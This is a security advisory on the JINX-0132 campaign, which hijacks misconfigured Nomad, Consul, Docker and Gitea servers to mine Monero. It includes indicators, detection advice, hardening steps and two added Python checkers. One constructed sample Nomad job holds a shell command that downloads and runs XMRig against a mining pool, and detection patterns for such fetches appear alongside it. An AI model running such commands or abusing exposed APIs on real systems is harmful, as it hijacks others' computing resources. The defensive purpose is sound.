
Cryptojacking Campaign Targeting DevOps Platforms (JINX-0132)

June 4th, 2025

Severity Level: High

Technical Details

The JINX-0132 campaign targets misconfigured and exposed DevOps tools—primarily HashiCorp Nomad, Consul, Docker Engine API, and Gitea—to deploy XMRig cryptocurrency miners. In Nomad, attackers exploit the default-permissive job API to remotely submit jobs that execute shell commands, downloading the miner directly from GitHub. Offensive or arbitrary job names are often used to avoid detection.

In Consul, the attacker registers rogue services and leverages script-based health checks to execute mining payloads. Without adequate access control lists (ACLs), this method enables remote code execution across connected nodes.

Misconfigured Docker APIs exposed to the internet (tcp://0.0.0.0:2375/2376) allow attackers to create privileged containers, mount host filesystems, and deploy miners with root access. Gitea instances are compromised through various paths, including CVE-2020-14144 and insecure installation scripts, which permit attackers to gain administrative access or execute malicious Git hooks.

The attacker avoids custom malware, instead relying on official open-source tools and public repositories—particularly GitHub—to deliver payloads. This “living-off-open-source” approach minimizes forensic evidence, with the only consistent indicator of compromise (IOC) being the Monero wallet address used for mining rewards.

Our Cyber Threat Intelligence Unit has recently identified a cryptojacking campaign orchestrated by the threat actor JINX-0132, which is actively exploiting vulnerable and misconfigured DevOps platforms, including HashiCorp Nomad, Consul, Docker Engine API, and Gitea. The attacker leverages public misconfigurations, default settings, and known vulnerabilities to deploy XMRig Monero mining software, effectively hijacking system resources for illicit cryptocurrency mining.

The campaign was detailed in a threat report by Wiz Research, marking the first documented instance of in-the-wild abuse of publicly exposed Nomad servers. This operation reflects a growing trend of “living-off-open-source” tactics, where attackers use legitimate tools and public infrastructure to evade detection and attribution.


Impact

  • Financial Cost: Unauthorized cryptocurrency mining leads to excessive cloud computing usage, resulting in significant financial expenses.

  • Operational Risk: High CPU and memory usage diminish service performance and availability.

  • Security Exposure: Compromised platforms can serve as pivot points for lateral movement within cloud environments.

  • Attribution Challenge: The use of public tools and legitimate binaries hinders traditional detection and forensic analysis.

Detection Method

  • Detecting this threat requires a multi-layered approach: endpoint monitoring, memory analysis, and tracking of abnormal or unauthorized job submissions in Nomad.

  • Analyze service registration and script-based health checks in Consul.

  • Monitor API activity on Docker ports 2375 and 2376, especially for external requests.

  • Flag downloads of XMRig binaries or command executions from GitHub on servers.

  • Track outbound connections to known Monero mining pools (e.g., pool.supportxmr.com:443).

  • Utilize file integrity monitoring and behavioral analytics to detect and identify unexpected miner processes.
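As an added example (not code from the advisory or from Wiz Research), a Python check that inspects a Nomad job submission body for the pattern described above: a raw_exec or exec task that fetches a tarball, a reference to the XMRig GitHub release URL or the mining pool, or the NIGNOG task group name. The job layout follows Nomad's JSON job API (POST /v1/jobs); the two sample jobs are constructed, not captured traffic.

```python
import json
import re

# Indicators taken from the advisory's IoC table.
SUSPICIOUS_GROUP_NAMES = {"NIGNOG"}
MINING_POOL = "pool.supportxmr.com"
XMRIG_RELEASE = re.compile(r"github\.com/xmrig/xmrig/releases/download/", re.I)
# Drivers that run host commands; fetching a tarball from one is the campaign's pattern.
SHELL_DRIVERS = {"raw_exec", "exec"}
FETCH_ARCHIVE = re.compile(r"\b(curl|wget)\b.*\.tar\.gz", re.I)


def _strings(obj):
    """Yield every string nested anywhere in a JSON value (task Config map)."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, (dict, list)):
        for v in (obj.values() if isinstance(obj, dict) else obj):
            yield from _strings(v)


def inspect_job(job_json: str) -> list[str]:
    """Return human-readable findings for one Nomad job submission (JSON body)."""
    job = json.loads(job_json).get("Job", {})
    findings = []
    for group in job.get("TaskGroups") or []:
        gname = group.get("Name", "")
        if gname in SUSPICIOUS_GROUP_NAMES:
            findings.append(f"task group '{gname}' matches a JINX-0132 indicator")
        for task in group.get("Tasks") or []:
            driver, tname = task.get("Driver", ""), task.get("Name", "?")
            blob = " ".join(_strings(task.get("Config", {})))
            if driver in SHELL_DRIVERS and FETCH_ARCHIVE.search(blob):
                findings.append(f"{driver} task '{tname}' fetches a tarball with curl/wget")
            if XMRIG_RELEASE.search(blob):
                findings.append(f"task '{tname}' references the XMRig GitHub release URL")
            if MINING_POOL in blob:
                findings.append(f"task '{tname}' references mining pool {MINING_POOL}")
    return findings


# Constructed samples (not captured traffic) in the shape of a POST /v1/jobs body.
MALICIOUS_JOB = json.dumps({"Job": {"ID": "sys-update", "TaskGroups": [{"Name": "NIGNOG", "Tasks": [{
    "Name": "run", "Driver": "raw_exec", "Config": {"command": "/bin/sh", "args": ["-c",
    "curl -sL https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz"
    " | tar xz && ./xmrig -o pool.supportxmr.com:443"]}}]}]}})
BENIGN_JOB = json.dumps({"Job": {"ID": "web", "TaskGroups": [{"Name": "web", "Tasks": [{
    "Name": "nginx", "Driver": "docker", "Config": {"image": "nginx:1.27"}}]}]}})
```

Running `inspect_job` over each body posted to the job API (or over the audit log of submissions) turns the four indicators into one alert per task.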

Indicators of Compromise

| Type | Value | Description |
|------|-------|-------------|
| XMRig Hash | ea7c97294f415dc8713ac8c280b3123da62f6e56 | Official XMRig v6.22.2 binary |
| Monero Wallet | 468VEByGGFQSN2bJG99ovhe5SG9SLxLAA9e2s7tWFxvBM33FAEP4JbwYHEeXexq8djYpDEHg9Jq6eGF3rREnAAc4UkjLd3E | Used for mining rewards |
| Nomad Task Group Name | NIGNOG | Static offensive term used in malicious jobs |
| Mining Pool | pool.supportxmr.com:443 | Known destination in mining config |
| Payload Source | https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz | Miner download URL used in the attack |



Recommendations

To mitigate the risks associated with this threat, organizations should take the following actions:

  • Implement strict access control lists (ACLs) for Nomad APIs and restrict access to job submission only to authorized users.

  • Disable unauthenticated or unnecessary script checks in Nomad and Consul.

  • Configure Consul with ACLs and verify all service registration processes.

  • Restrict Docker API exposure to internal interfaces only.

  • Use TLS encryption and authentication for Docker API access.

  • Regularly patch and update Gitea instances to address known vulnerabilities.

  • Disable or strictly control git hook permissions in Gitea.

  • Secure installer scripts post-deployment in Gitea environments.

  • Monitor for downloads of mining tools and unusual container activity.

  • Block outbound connections to known Monero mining pools.

  • Continuously audit exposed services using tools like Shodan or CSP-native posture tools.

  • Segment network zones and implement zero-trust access principles.

  • Deploy runtime security tools that detect misuse of containers or APIs.
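As an added example that is not part of the advisory, a Python posture check covering the three configurations the recommendations address (Consul agent config, Nomad config and Docker daemon.json, each in its JSON form), run over a constructed weak stack beside a hardened one. The keys checked are the real configuration keys of each product; the certificate paths in the hardened Docker config are placeholders.

```python
ALL_INTERFACES = ("tcp://0.0.0.0:", "tcp://[::]:", "tcp://:")

def audit_consul(cfg: dict) -> list[str]:
    """Consul agent config: ACLs and script-check exposure."""
    findings = []
    acl = cfg.get("acl") or {}
    if not acl.get("enabled"):
        findings.append("consul: ACLs disabled, any client can register services")
    elif acl.get("default_policy", "allow") != "deny":
        findings.append("consul: acl.default_policy should be 'deny'")
    if cfg.get("enable_script_checks"):
        # enable_local_script_checks is the safe alternative: only checks from local config files run.
        findings.append("consul: enable_script_checks lets API-registered services run commands")
    return findings

def audit_nomad(cfg: dict) -> list[str]:
    """Nomad config: job submission must require an ACL token."""
    if (cfg.get("acl") or {}).get("enabled"):
        return []
    return ["nomad: ACLs disabled, the job API accepts submissions from anyone"]

def audit_docker(daemon: dict) -> list[str]:
    """Docker daemon.json: no plaintext or all-interface TCP listeners."""
    findings = []
    for host in daemon.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix sockets are local-only
        if host.startswith(ALL_INTERFACES):
            findings.append(f"docker: {host} binds every interface")
        if not (daemon.get("tlsverify") and daemon.get("tlscacert")):
            findings.append(f"docker: {host} accepts API calls without client certificates")
    return findings

# Constructed configs, not taken from any real deployment; cert paths are placeholders.
WEAK = {
    "consul": {"enable_script_checks": True},
    "nomad": {},
    "docker": {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]},
}
HARDENED = {
    "consul": {"acl": {"enabled": True, "default_policy": "deny"}, "enable_local_script_checks": True},
    "nomad": {"acl": {"enabled": True}},
    "docker": {"hosts": ["unix:///var/run/docker.sock", "tcp://10.0.1.5:2376"], "tlsverify": True,
               "tlscacert": "/etc/docker/ca.pem", "tlscert": "/etc/docker/server-cert.pem",
               "tlskey": "/etc/docker/server-key.pem"},
}

def audit(stack: dict) -> list[str]:
    return audit_consul(stack["consul"]) + audit_nomad(stack["nomad"]) + audit_docker(stack["docker"])
```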

Conclusion

The JINX-0132 cryptojacking campaign underscores the substantial risk posed by misconfigured DevOps infrastructure in contemporary cloud environments. By exploiting default settings and public APIs, attackers can achieve remote code execution without the need for custom malware, making traditional detection methods less effective.

Organizations must implement a defense-in-depth strategy by securing APIs, hardening configurations, and continuously monitoring their cloud surface. With high operational stealth and real financial impact, campaigns like JINX-0132 represent a critical security concern for any organization utilizing cloud-native DevOps platforms.
